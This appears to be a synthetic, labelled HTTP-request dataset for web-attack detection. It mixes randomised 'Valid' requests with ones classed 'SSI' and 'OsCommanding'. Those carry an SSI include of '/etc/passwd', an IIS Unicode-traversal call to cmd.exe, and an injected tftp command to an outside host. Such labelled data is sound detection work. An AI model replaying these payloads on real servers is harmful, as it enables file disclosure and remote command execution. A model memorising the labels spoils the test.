Cookie2: $Version="28"
Date: Sun, 12 Oct 08 06:39:26 GMT
ETag: "azk_rN20wtoPDiQA8P"
Expect: 100-continue
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Fri, 06 Feb 04 03:55:55 UTC
If-Unmodified-Since: Sat, 10 Oct 09 22:14:10 CET
If-Match: "fx9Q8d6@61AnTJoiPlfz"
If-None-Match: "CUGF-BuxJDHJGYh5f"
If-Range: "vk40kbpJK9fDhFl"
Max-Forwards: 5
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: NTLM bmVpZWhlNmllb0VoNjFoZnR0aHl5MTNjbDhlbnVyamo=
Range: -8,856500-,-6463
Referer: http://4umt8.de/qIeyqthe/aiclo/rsnbTt.doc
TE: deflate
Trailer: Accept
User-Agent: Mozilla/6.0 (X11; U; SunOS sun4u 1.9; na-tt; rv:5.5.9) Gecko/71608124
UA-CPU: Sparc
UA-Disp: 216,5024,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 165x736
Via: ok8cg/8.7 www.iww5gt.shtml
Transfer-Encoding: compress
Upgrade: r9sP/4.2, ek3c/8.3, hde/4.8, hcnli/4.1, mt9/7.2
Warning: 262 www.itetharh.css "tdqd4ieaDLErnog" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12001
Start - Id: 39696
class: SSI
GET /teDr/uhdsecdit9r/eoc_M6FUtD6kD.asp?9uatoxr0Rgr1o=Pd+atrhbinw%5D%3Aa%7Ednnaccess_log+oo&2htLlnoiyze3heh=%3C%21--+++++%23include++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&ran=4306948&nrtu=2397&5otrleaoge=524&8botrl8as0ebt=2640946 HTTP/1.1
Host: www.0Eiaeudoh.biz
Connection: efnno6
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-3, iso-2022-kr;q=0.1, windows-1257;q=0.5, iso-8859-2
Accept-Encoding: compress;q=0.0
Accept-Language: *;q=0.4
Cache-Control: min-fresh=276
Client-ip: 179.111.181.116
Cookie: d2eqar1=oidernc;agTnuOe=psh9i;sra9ke5=bK7ZIo;edaort=nLahZMcYNYd7;ieegRrlD1dasMau=tY-.METMCSl;reedyr7oeoibo5=I/ehm
Cookie2: $Version="14"
Date: Thu, 21 Jan 10 01:59:25 GMT
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Wed, 11 Feb 09 18:30:43 UTC
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Apr 08 02:38:32 UTC
Max-Forwards: 770
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aDJlRTplb2V2b2ll
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 11490-87515,-392,063833-721563
Referer: http://ezlytuf.cz/Tdis/ltRheEo5/sast98t/nttd.jsp
TE: gzip;q=0.7,deflate;q=0.3
Trailer: If-Match
User-Agent: ibEsc (fnb-5NK; akFaZ3; cNGqVD6; imF2zJ@FO; aDuMDsr0UR)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: 3.7 112.42.80.76:6
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39696
Start - Id: 3764
class: Valid
GET /ukW.ndNIumRTcLJBHR/7t/iesm5i/tkhzxv-a/DiaeaSnanwtleIpstMi/d7wnzM/rfLvNkwr53/t0endwCStstiooeoge/h@@J3TU-STAtP/2VvMj6oK.html?us=07835537 HTTP/1.1
Host: www.kTct.gov:4
Connection: keep-alive
Accept: text/*, audio/*;q=0.7
Accept-Charset: windows-1252;q=0.1, cp-936;q=0.9, shift_jis;q=0.0, windows-1250, iso-8859-8-i;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 219.33.16.220
Cookie: b64Xf=6307111;P6qH.D_I5l= mal % jlEwgetohsUre;udd4gxwoadMrg5=ieada;PwbingW@cadminE=3aLho;leA8aRphs5e2eso=nlpoaccess_logqmir6Ipee'
Cookie2: $Version="851"
Date: Wed, 29 Aug 07 21:36:36 CET
ETag: W/"J9zVxeYsN18fjLtQhc"
Expect: 100-continue
From: ueatims@oatosfu.net
If-Modified-Since: Tue, 10 Apr 07 03:07:48 UTC
If-Unmodified-Since: Wed, 01 Feb 06 03:08:40 CET
If-Match: "Y_eiRhnNZKlFJU9RmkN"
If-None-Match: "3kG@K-C-sAsyU6jgSjvX"
If-Range: Mon, 20 Dec 04 14:36:51 CET
Max-Forwards: 14
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: d7tg8 ePiym=ryti
Authorization: rinrw wligltt=y3af2rni
Range: 106-087945,9846-
Referer: /cgpAP.wav
TE: chunked;q=0.3,trailers
Trailer: Host
User-Agent: thbakfikI3 http://www.a1rmnehe.it
UA-CPU: x86
UA-Disp: 599,9039,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0475x7705
Via: nwah/1.3 92.117.221.219, AarneE/1.8 98.241.120.209
Transfer-Encoding: compress
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 560 158.84.137.179 "hzeenCn" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3764
Start - Id: 23787
class: Valid
GET /a0GbnzFN9VLCxSZoCZ/rhodous/h4SQJ/ovtxxiuhsiex/4WdO/uhiiGTalsyor1hpdEnw/N8KLYU6g7-0uh/wF@X4e.w/a8eedttEatteO9a9e/lFoedUca0h1aGkxDD.tiff? HTTP/1.0
Host: www.faaoutdh.ch:0
Connection: Toctres
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 154.88.240.38
Cookie: titugiaehEs=ThiL;aeQp7sSSlike.m=6idhrw hc;senh6arLgb=r2cafQB
Cookie2: $Version="616"
Date: Mon, 21 Nov 05 13:30:17 CET
ETag: W/"XK3x1MeXV6pUd.ROaYk8"
Expect: psTpli=u3iv6e
From: hotlo9an@ujrsfnuwaa.it
If-Modified-Since: Tue, 08 Aug 06 19:23:17 CET
If-Unmodified-Since: Sat, 19 Apr 08 13:01:24 CET
If-Match: "pGFFdehUqip3rNwJ2"
If-None-Match: "mgQ3U.3n@jWlLfR0x"
If-Range: Thu, 17 May 07 23:58:12 CET
Max-Forwards: 91
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="teLY"
Authorization: Digest nonce
Range: 228872-,806438-
Referer: /hneot/ssp1x/ueav23sl/te6gse7e/aaoot.pdf
TE: gzip;q=0.6
Trailer: Accept-Charset
User-Agent: lxnp/6.5
UA-CPU: MIPS
UA-Disp: 3668,047,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 884x6494
Via: FTP/3.4 209.104.204.155, HTTP/6.7 www.tnoa.html, 8.2 www.Yeocr.tiff
Transfer-Encoding: compress
Upgrade: oeeuii/6.6, inSid6/6.9, srlses/9.9
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 23787
Start - Id: 32730
class: Valid
POST /tlYMI_CwOEZkCh3pc/eVrQZZ/n2/iZwtD0PyxktkHyPe-q/yzqX/s-I/tLeetgtey6nyol/Swehrsskl0ateuwlaow/mFU/d4/AHqJZnodeimgojlsdFMf.nsf? HTTP/1.0
Content-Length: 26
Content-Language: fcbr0,eVpeor
Content-Encoding: deflate
Content-Location: http://Htwe.st/sahe/eeuex/iintOPmw/soboWth.mpg
Content-MD5: ZmVpeWFld3JoeVRlcjNkdw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Jan 06 24:33:30 UTC
Last-Modified: Sun, 19 Sep 04 12:32:30 UTC
Host: www.h8nznsaj.de
Connection: lcRz
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.216.102.1
Cookie: .YD2i.Ltmp2Q3Z=o;tihep9zsheeOn='r<da
Cookie2: $Version="53"
Date: Tue, 03 Mar 09 24:32:33 GMT
ETag: "P4rYQxRGmRWfYPzbnT"
Expect: inEtim
From: eaop5a@jraia3l.uk
If-Modified-Since: Fri, 09 Jul 04 16:01:40 UTC
If-Unmodified-Since: Sun, 29 Nov 09 13:44:36 UTC
If-Match: "rLnT6UghCHAxGDUcmYyx"
If-None-Match: *
If-Range: *
Max-Forwards: 697
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM bTR0ZWlyMnBpYW15ZXR0NWxlcGFoM2VpdDZzYTR1YWlyRXJvc25uaXQ=
Authorization: Digest uri=http://www.eiiesntf.net/9genFto/dteE.php4
Range: 90783-,-4
Referer: http://40minel.cz/rwirreo/oy8aruc/eisiso/phfehai/tarin.msf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (compatible; Konqueror/1.7; Solaris; cgffe)
UA-CPU: Sparc
UA-Disp: 9205,1280,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1032x4856
Via: 2.7 www.ljm4.shtml, 2.4 17.87.229.111, hHflr/2.3 71.96.249.160
Transfer-Encoding: deflate
Upgrade: Ontms/2.9, ocVpad/2.0, t7o/2.5
Warning: 971 www.nreie.html:86955 "sootstDgebnbLaecv" 
X-Forwarded-For: 154.7.116.173
X-Serial-Number: 16114956793159
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bhdthofA2nuQb=87&Lc=(dju

End - Id: 32730
Start - Id: 33145
class: Valid
PUT /rtKs6WJZW.cE/qNdeIJEr/zdonielxe1vgotp/a7/eH1a169l8X/lf@/0Tm1m1.OPxQIp7c/oR7UXzhnzhI5/rN.cgi? HTTP/1.0
Content-Length: 248
Content-Language: iiinue,ronnr
Content-Encoding: deflate
Content-Location: /saidqn8/isrltla/ehhm.sh
Content-MD5: czNvZXN0bG95ZW50dHJncw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Dec 05 07:36:53 CET
Last-Modified: Wed, 18 Jun 08 02:58:25 GMT
Host: www.wWmietarhs.be
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, gzip, identity
Accept-Language: eeA1js-nh;q=0.9, fxsnwrc-7t, lffclA0O-tcim;q=0.4, e-ttesnEe
Cache-Control: no-store
Client-ip: 202.221.249.103
Cookie: ayz2Mi=eXu0dNGU;orreeeaefw=bm;oA3LMtFscript=oCXJk_LqudR
Cookie2: $Version="70"
Date: Tue, 02 Jun 09 09:49:06 CET
ETag: "CIYpvMZBh6R6qvtRRp"
Expect: dAne=httv
From: ohQyhh@xrftrNqa5.ch
If-Modified-Since: Thu, 26 Feb 09 16:10:14 UTC
If-Unmodified-Since: Mon, 14 Feb 05 13:45:38 CET
If-Match: "U3IZYxHpJFoHa27H5"
If-None-Match: "tT3J4yP.T2.NY9DPj4b"
If-Range: Wed, 14 Jan 09 11:50:17 GMT
Max-Forwards: 777
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM RXA5bGQxNGJnYUFsOHNiaXR0amVyNTZhbWFud3NhaWVhZW4=
Range: 2283-08,769-296466,942-
Referer: http://et7tldaa.st/wioopder/eilri7a/Oila/trajia.css
TE: chunked,deflate
Trailer: Authorization
User-Agent: lZewv.b http://www.atH1ayi.gov
UA-CPU: x86
UA-Disp: 888,820,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6581x441
Via: 1e6u/5.9 47.235.187.133, 4.6 88.132.95.237, 1.7 87.35.92.137
Transfer-Encoding: identity
Upgrade: ovT/9.9, reD/3.1, eel/0.6, oeey/7.8, u2uyl/8.8
Warning: 541 www.lrooltb.jpg "eaO7ssg4nbeu" 
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

paa3=b/&bckoee5eOtc=4&to=s4maG&td9glrd=c9t4&yansw=oEr=jn|imietrgb&sgetoye9udo=senlhc9&hwIax3o=n titAl&atr4sseu0=440434357&IyHLk8NS=o&kfnyy&t9of_wpassthruRN=5977&srohssv=lib4&BMwr.wget= >replacei&iuY9dropDr=z&wzilitvl6nry=bo %&ii9ihd=576

End - Id: 33145
Start - Id: 44104
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 56.169.14.33:139
Connection: w6eo
Accept: audio/basic;q=0.5, image/*;q=0.4
Accept-Charset: utf-8, x-mac-greek;q=0.2
Accept-Encoding: *
Accept-Language: d-rs;q=0.3, glu-raN;q=0.7
Cache-Control: only-if-cached
Client-ip: 236.2.174.53
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Wed, 20 Jun 07 04:08:02 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Wed, 03 Mar 10 10:44:26 CET
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: *
Max-Forwards: 879
MIME-Version: 4.3
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 70-
Referer: /xeieaer/5lnzEyen.css
TE: deflate
Trailer: Date
User-Agent: 7-i7adpI. http://www.ndmsgegs.de
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1501x189
Via: 5.3 201.253.147.38, hGpre/8.3 207.50.65.250
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 194.144.61.158
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44104
Start - Id: 33127
class: Valid
POST /yiehw4qghseouS4ia43a/bp0TI/erLSoanesfe86ueen3o/oeekeE/oob4bumenxtraaTste/d8@6Z2.mspx? HTTP/1.0
Content-Length: 236
Content-Language: lasodins
Content-Encoding: identity
Content-Location: /e4s8t8et.txt
Content-MD5: dHJhbHdXY3BoZW9UdGljcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jan 08 10:27:56 GMT
Last-Modified: Sat, 05 May 07 08:17:47 CET
Host: www.2wLbof.de
Connection: rstoeasc
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: max-age=269
Client-ip: 230.124.221.154
Cookie: elArxp=8330;46=ht;la53motwodl4=node;tmjnten=seKqqa;ts4k=9688212
Cookie2: $Version="0"
Date: Sun, 28 May 06 12:11:04 UTC
ETag: "FuhKu4sJi4zJ5TTZcB@"
Expect: fxc03c9
From: oreei@8yfem.be
If-Modified-Since: Fri, 10 Jul 09 13:43:35 GMT
If-Unmodified-Since: Mon, 28 Aug 06 14:37:18 GMT
If-Match: "Szvqlo@ZYsqKHiUjaVQA"
If-None-Match: *
If-Range: Tue, 29 Aug 06 08:16:15 GMT
Max-Forwards: 7023
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic N3RhN3JuOnVkbW5zZA==
Authorization: Digest opaque="d3Nact"
Range: -787,80891-464,53849-
Referer: /ihwlae/lho9Elm/tazhi.jsp
TE: chunked;q=0.9,trailers
Trailer: Range
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 7.3; or-fe; rv:7.8.2) Gecko/33316306
UA-CPU: MIPS
UA-Disp: 035,199,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6581x441
Via: 6.1 www.osmnsW.shtml:746, 6.3 www.hiean.jpeg, nneesr/6.5 www.siut.png
Transfer-Encoding: gzip
Upgrade: i1oE/1.8, htoee/2.9, lnsedh/9.7, rNtlnM/5.3
Warning: 903 www.rzea4yr.htm "r5iGesaOlmea2osamrqa" "Tue, 10 Feb 04 12:04:44 GMT"
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1rnNDwnft=r&Seawr2qs=4baor&wdssoat6se=v00eTocesju&tey=37877&3stisawRiaoew=iunsestImuSxEeo&08uformU4=i&oegsurr=4473085393&sr=4pa<(iesO  oesc ;&oi=mryisnNe&erin1osyr=sha&ogootlepgeW=Gos&NZmeh3NE=8ut&h1a8lzaho=78&allXP00m=tnaregInwor

End - Id: 33127
Start - Id: 7356
class: Valid
POST /qrsnm3sogo1/taR02biInodlnen/pdL1xrrR8/pnsntkgimRsseuttkens/yIbcJWlE.sEW/eO@iq2LX0/ttmTORfP/Ristndn/JF3ChO_.wXPlpGK/0IIaWr2y8/aLPl.pl? HTTP/1.0
Content-Length: 80
Content-Language: hrrg
Content-Encoding: identity
Content-Location: http://eddoik.biz/eextiat/cl1jtfen/tqo7op/ysei1.sh
Content-MD5: ZWVhbmxlN3NCdHJ5d2NyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Feb 10 09:14:56 CET
Last-Modified: Mon, 21 Sep 09 18:41:46 UTC
Host: www.k8nh.org:8950
Connection: close
Accept: application/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: i-rovnt;q=0.1, edeotct-sotp4je
Cache-Control: min-fresh=03
Client-ip: 127.183.145.17
Cookie: FDidafOrGanull=06345414
Cookie2: $Version="0"
Date: Fri, 02 Apr 10 01:21:06 UTC
ETag: "9CbyWaf_xiRfSZA47"
Expect: 100-continue
From: meeit@m7Q8t.cz
If-Modified-Since: Tue, 20 Oct 09 12:58:47 UTC
If-Unmodified-Since: Mon, 23 Feb 09 16:42:15 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 22 May 05 10:56:29 GMT
Max-Forwards: 64
MIME-Version: 3.6
Pragma: 5tel1uBe=onll
Proxy-Authorization: Basic eW5lb3RJek86NWZjdA==
Authorization: Basic bG1od2R3bDpuRDd0bQ==
Range: -38,928255-,664-
Referer: http://Mfsnla4c.de/llrrt9/catmrax.mdb
TE: trailers,deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.6 (X11; U; Linux i386 0.2; 7n-of; rv:4.6.7) Gecko/66186938
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 626x2025
Via: FTP/6.9 www.iLtelf.css
Transfer-Encoding: gzip
Upgrade: heer/1.8, hjiO/5.4, eAtc/2.6, eotk/8.4
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 199.98.82.192
X-Serial-Number: 33978029627174385263
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xKHrYform=idBH&dh3aalecc=805&nhf2rrddBftTt=7&iiodnwuoten59ij=47895773&9I55=qEsxo

End - Id: 7356
Start - Id: 43152
class: OsCommanding
GET /pEfOgcZpfdkvpEmO/deEl78KmRVW2o/s3u/aantwD/t3Idhhel1o/i-u/wxme/eQsErgrJLIrG7bO/eBdigeXue1PfQGq.cfm?kabnm31dyLi=%5Cn+uftp++-p+www.ngne.com++%2Fordeng%2Fvesemelisian%2Fngarie%2Fmeel%2Fme%2Farta HTTP/1.0
Host: www.nelco.com
Connection: keep-alive
Accept: text/html, video/*;q=0.2, image/jpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: bC-sxsidbz;q=0.4, wat6e-iim
Cache-Control: max-age=8868
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="08"
Date: Mon, 06 Jun 05 21:31:16 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: 100-continue
From: riAeyrh@tgaMea.st
If-Modified-Since: Thu, 11 Dec 08 04:42:05 CET
If-Unmodified-Since: Fri, 06 Oct 06 07:39:07 GMT
If-Match: "GmHZ7LOn_@aij39g"
If-None-Match: "UoQL0QEGsw-9tk4lG"
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 20
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM bW9lbndtb250NGE5ZHRscnhuYTI2ZGRyMlNjc2x0cmhGTg==
Authorization: Basic RGVvcGpnNjpkb3RpT0hl
Range: 46359-,93372-15,76-
Referer: /tlapokfd/ceoo6uee/ndahfcd/Iaopk.jpg
TE: gzip;q=0.4,trailers
Trailer: Host
User-Agent: ltts3irmzYs
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: HTTP/8.5 149.159.34.115
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43152
Start - Id: 17897
class: Valid
GET /eoOei.jpeg? HTTP/1.0
Host: 59.86.230.171
Connection: close
Accept: image/jpeg;q=0.5, text/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=3956
Client-ip: 164.114.63.216
Cookie: i53Ko7otwbsw=va
Cookie2: $Version="5"
Date: Tue, 24 Feb 09 22:55:14 CET
ETag: W/"7L50ptidMFetyRv8P"
Expect: hfa1i=d9teiRn
From: rdny@hctpuostk.cz
If-Modified-Since: Tue, 29 May 07 08:09:15 CET
If-Unmodified-Since: Sun, 12 Feb 06 20:57:12 GMT
If-Match: "@d5I-Wf8.LivGz-l17"
If-None-Match: *
If-Range: Tue, 19 Jan 10 17:32:53 UTC
Max-Forwards: 36
MIME-Version: 7.2
Pragma: snsc='ulr'
Proxy-Authorization: Digest realm
Authorization: Digest opaque="ulmex"
Range: -87,9893-
Referer: http://dtiis.gov/0e0rQ9/i10ea2jc.html
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: w0EXoBcYID http://www.titof.org
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: 2.6 www.vrT6.tiff, dRl/5.8 33.22.155.169, 2.9 www.2rnh.jpeg
Transfer-Encoding: identity
Upgrade: tigP/7.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 4786268
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17897
Start - Id: 6389
class: Valid
POST /ddCehwyRoepetpetcit/osmgxsri.jpeg? HTTP/1.1
Content-Length: 188
Content-Language: lpii4
Content-Encoding: identity
Content-Location: /fmifu8/uee6ysr/jfteevs/tnhn00/2wiwctje.asmx
Content-MD5: b2l4bWFzc29ydGZkb3R1QQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Mar 06 15:32:18 CET
Last-Modified: Wed, 24 Dec 08 12:44:03 UTC
Host: 115.133.220.0
Connection: keep-alive
Accept: text/*;q=0.9, image/png, video/quicktime
Accept-Charset: iso-8859-4
Accept-Encoding: *;q=0.2
Accept-Language: al-Eea2msfn;q=0.7, e18-cI1oewpN, tec8ze-stczw;q=0.5
Cache-Control: no-store
Client-ip: 113.133.52.70
Cookie: soeoaifeTVdn=txfwgettacceptolego q2N 
Cookie2: $Version="57"
Date: Thu, 27 Oct 05 23:14:26 GMT
ETag: W/"oLi22bpiY0WGmAas"
Expect: uUAn
From: 2wd8O@tldltfa.biz
If-Modified-Since: Thu, 22 May 08 11:56:45 UTC
If-Unmodified-Since: Sat, 11 Aug 07 16:00:11 GMT
If-Match: *
If-None-Match: *
If-Range: "JeuLpdaD9QUJg1g"
Max-Forwards: 061
MIME-Version: 1.6
Pragma: uNe=x3v0Ura
Proxy-Authorization: Basic cnJzdWRpaDpzN3RuZXU=
Authorization: Basic d2FPbXJnOkVpdG5hbHM=
Range: 83671-8,23398-70351,45-
Referer: /aacb/crzeue0n/othm/oraCr/3ln3en.msf
TE: trailers,deflate,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 6.5; tr-y9; rv:4.4.1) Gecko/25619030
UA-CPU: MIPS
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4815x4543
Via: 4.5 175.46.178.178
Transfer-Encoding: identity
Upgrade: rikg/9.0, bbzh1e/9.9, mnlfb/3.2, lims1a/1.6, till/2.1
Warning: 328 3.138.213.144 "lmuOhocahea5tEu" 
X-Forwarded-For: 4.205.122.56
X-Serial-Number: 10020198390
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

twt0he=tEeaizncenaceno3&Nib.AWRN=7aSaaIcDp&%udZe1A6s=285&6AreplaceSvE.K=1&3MdbhryrSEibih=1&trdqlohdeEawi=eHLN&k-_JWbodyWzH=0ne4no-bodylsnlo&iAhodrnf=he&theoEEeCraLzawt=89877&rEwalc=8235361

End - Id: 6389
Start - Id: 27018
class: Valid
GET /X@.php?ieaEiaOi=+ulrl&7ttrsra=93&urtT=8416644&aoma=rBftbiG&ienaen=wemscma8ir&GZBpasswdmochaxtermQJYetcD=486532&Nmrnceeh=101320&ranqhezdtrx=group+byiw&1el=%28soece&oekMia=phpihe HTTP/1.1
Host: 219.120.107.222
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: nr='yoaoE'
Client-ip: 202.222.48.227
Cookie: a0zTheIlh=6151;eRttilqysrvsh=nodeegaohtt;eanbi0=535737;tudt00=9fnca
Cookie2: $Version="609"
Date: Fri, 22 Oct 04 07:15:02 CET
ETag: W/"gNLdQ.apZ1RIwfNrF"
Expect: tncr=iroe;uoonohpD
From: erxoee@uwm9y1m1lh.net
If-Modified-Since: Tue, 27 May 08 11:18:25 CET
If-Unmodified-Since: Sat, 03 Feb 07 04:54:33 GMT
If-Match: *
If-None-Match: "vcOUe@R3h.4UV5RwcDB."
If-Range: Mon, 05 May 08 21:11:44 GMT
Max-Forwards: 551
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: Basic blVtaWY2ZTplaDFzbA==
Range: -2,41933-,520-237717
Referer: http://uIrlj.uk/vhbisY8o.aspx
TE: trailers
Trailer: Date
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 0.7; eg-Co; rv:5.8.5) Gecko/71129730
UA-CPU: StrongARM
UA-Disp: 9952,4769,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: HTTP/6.2 88.154.125.249
Transfer-Encoding: deflate
Upgrade: niuoa/4.9, niEhnt/1.9, inr8/1.3, leu/2.5
Warning: 866 www.tvytE8.tiff "nAg6tTeeSfegQmnsr" "Fri, 23 Jan 09 21:23:14 GMT"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 95252684073786404
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27018
Start - Id: 14088
class: Valid
GET /arrAE9L8mWTSyswxSnUk.png?1heot=actlr&cv=tfX-7tLnc-&Wwindow.openaPBZ0Y0Rl=aee&oyegwul=135&e6t=%5Co%3Dhht%25fr&aetfed=13&EenaOipDn=eXJtzPAbE&St-J=tc%400LVSSPi4n&iegace=5713&wherefwhered5VPX3HN=72&hms2Bnvshcsniis=3&LBEOwdEF=717&abtn5alnkuq=t3h&a2Eneebv=0765320 HTTP/1.1
Host: 120.248.252.44
Connection: aYaCu
Accept: text/plain, audio/*, image/*;q=0.3
Accept-Charset: big5;q=0.3, x-mac-japanese;q=0.8
Accept-Encoding: 
Accept-Language: Ntie-idjt;q=0.3, nnjtbfin-rr;q=0.8
Cache-Control: max-stale=43849
Client-ip: 84.70.0.106
Cookie: gGsehhmgara9r0=62384208
Cookie2: $Version="3"
Date: Sun, 31 Dec 06 05:39:20 CET
ETag: W/".dr9JQdIiJ3d_oxYF@aP"
Expect: aPny=a7Ek
From: nuea@cnmet.it
If-Modified-Since: Sun, 13 Dec 09 16:34:42 UTC
If-Unmodified-Since: Sun, 19 Apr 09 22:30:57 UTC
If-Match: "zZ.q1ooxiPd13mvL_"
If-None-Match: "caCEN@FJe0zO1IJ3oYB"
If-Range: Thu, 26 Aug 04 07:17:14 UTC
Max-Forwards: 0
MIME-Version: 9.0
Pragma: lmtn=mdel
